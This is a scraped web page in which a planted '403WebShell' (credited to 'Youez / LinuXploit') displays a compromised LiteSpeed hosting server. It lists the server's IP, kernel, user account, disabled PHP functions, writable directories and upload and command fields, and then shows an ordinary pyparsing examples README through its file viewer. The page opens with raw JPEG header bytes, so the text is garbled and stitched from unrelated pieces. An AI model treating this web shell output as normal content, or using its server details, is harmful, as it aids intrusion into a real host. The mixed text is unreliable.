JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 153.92.12.128  /  Your IP : 216.73.216.217
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/gsutil/third_party/pyparsing/examples/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/gsutil/third_party/pyparsing/examples/README.md
# Pyparsing Examples

This directory contains a number of examples of parsers created using pyparsing. They fall into a few general 
categories (several examples include supporting railroad diagrams):

<!-- TOC -->
* [Pyparsing tutorial and language feature demonstrations](#pyparsing-tutorial-and-language-feature-demonstrations)
* [Language parsers](#language-parsers)
* [Domain Specific Language parsers](#domain-specific-language-parsers)
* [Search and query language parsers](#search-and-query-language-parsers)
* [Data format parsers](#data-format-parsers)
* [Logical and arithmetic infix notation parsers and examples](#logical-and-arithmetic-infix-notation-parsers-and-examples)
* [Helpful utilities](#helpful-utilities)
<!-- TOC -->

## Pyparsing tutorial and language feature demonstrations
  * Hello World!
    * [greeting.py](./greeting.py)
    * [greetingInGreek.py](./greetingInGreek.py)
    * [greetingInKorean.py](./greetingInKorean.py)
    * [hola_mundo.py](./hola_mundo.py)
  * left recursion
    * [left_recursion.py](./left_recursion.py)
  * macro expansion
    * [macro_expander.py](./macro_expander.py)
  * Roman numerals
    * [roman_numerals.py](./roman_numerals.py)
  * Unicode text handling
    * [tag_metadata.py](./tag_metadata.py) [(diagram)](./tag_metadata_diagram.html)
  * chemical formulas
    * [chemical_formulas.py](./chemical_formulas.py)
    * [complex_chemical_formulas.py](./complex_chemical_formulas.py)
  * API checker
    * [apicheck.py](./apicheck.py) [(diagram)](./apicheck_diagram.html)
  * scan_string examples
    * [scanExamples.py](./scanExamples.py)
  * transform_string examples
    * [include_preprocessor.py](./include_preprocessor.py)
    * [macro_expander.py](./macro_expander.py)
    * [nested_markup.py](./nested_markup.py)
  * parse actions and conditions
    * [shapes.py](./shapes.py)
    * [number_words.py](./number_words.py) [(diagram)](./number_words_diagram.html)
    * [wordsToNum.py](./wordsToNum.py)
    * [range_check.py](./range_check.py)
    * [one_to_ninety_nine.py](./one_to_ninety_nine.py)
  * railroad diagrams
    * [railroad_diagram_demo.py](./railroad_diagram_demo.py) [(diagram)](./railroad_diagram_demo.html)
  * web page scraping
    * [getNTPserversNew.py](./getNTPserversNew.py)
    * [html_stripper.py](./html_stripper.py)
    * [html_table_parser.py](./html_table_parser.py)
    * [urlExtractorNew.py](./urlExtractorNew.py)
## Language parsers
  * C
    * [oc.py](./oc.py)
  * lua
    * [lua_parser.py](./lua_parser.py) [(diagram)](./lua_parser_diagram.html)
  * lox
    * [lox_parser.py](./lox_parser.py) [(diagram)](./lox_parser_diagram.html)
  * verilog
    * [verilog_parse.py](./verilog_parse.py)
  * brainf*ck
    * [bf.py](./bf.py) [(diagram)](./bf_diagram.html)
  * decaf
    * [decaf_parser.py](./decaf_parser.py) [(diagram)](./decaf_parser_diagram.html)
  * S-expression
    * [sexpParser.py](./sexpParser.py)
  * rosetta code
    * [rosettacode.py](./rosettacode.py) [(diagram)](./rosettacode_diagram.html)
## Domain Specific Language parsers
  * adventureEngine - interactive fiction parser and game runner
    * [adventureEngine.py](./adventureEngine.py) [(diagram)](./adventure_game_parser_diagram.html)
  * pgn - Chess notation parser
    * [pgn.py](./pgn.py)
  * TAP - Test results parser
    * [TAP.py](./TAP.py) [(diagram)](./TAP_diagram.html)
  * EBNF - Extended Backus-Naur Format parser (and compiler to a running pyparsing parser)
    * [ebnf.py](./ebnf.py) [(diagram)](./ebnf_diagram.html)
    * [ebnf_number_words.py](./ebnf_number_words.py) [(diagram)](./ebnf_number_parser_diagram.html)
## Search and query language parsers
  * basic search
    * [searchparser.py](./searchparser.py) [demo](./searchParserAppDemo.py)
  * lucene
    * [lucene_grammar.py](./lucene_grammar.py) [(diagram)](./lucene_grammar_diagram.html)
  * mongodb query
    * [mongodb_query_expression.py](./mongodb_query_expression.py) [(diagram)](./mongodb_query_expression.html)
  * SQL
    * [select_parser.py](./select_parser.py) (SELECT statements)
    * [sql2dot.py](./sql2dot.py) (TABLE DML statements)
  * BigQuery view
    * [bigquery_view_parser.py](./bigquery_view_parser.py)
## Data format parsers
  * JSON
    * [jsonParser.py](./jsonParser.py)
  * protobuf
    * [protobuf_parser.py](./protobuf_parser.py)
  * stackish
    * [stackish.py](./stackish.py)
  * CORBA IDL
    * [idlparse.py](./idlparse.py)
## Logical and arithmetic infix notation parsers and examples
  * [fourFn.py](./fourFn.py)
  * [simpleArith.py](./simpleArith.py)
  * [eval_arith.py](./eval_arith.py)
  * [simpleCalc.py](./simpleCalc.py)
  * [LAparser.py](./LAparser.py) (linear algebra)
  * [simpleBool.py](./simpleBool.py)
## Helpful utilities
  * parse time expressions ("2pm the day after tomorrow")
    * [delta_time.py](./delta_time.py) [(diagram)](./delta_time_diagram.html)
  * invert regex (generate sample strings matching a regex)
    * [inv_regex.py](./inv_regex.py)
  * email addresses
    * [email_address_parser.py](./email_address_parser.py)
  * Excel cell formula
    * [excel_expr.py](./excel_expr.py)
  * ctypes interfaces code generator from C include.h file
    * [gen_ctypes.py](./gen_ctypes.py)
  * log file parsing
    * [httpServerLogPaser.py](./httpServerLogPaser.py)



Youez - 2016 - github.com/yon3zu
LinuXploit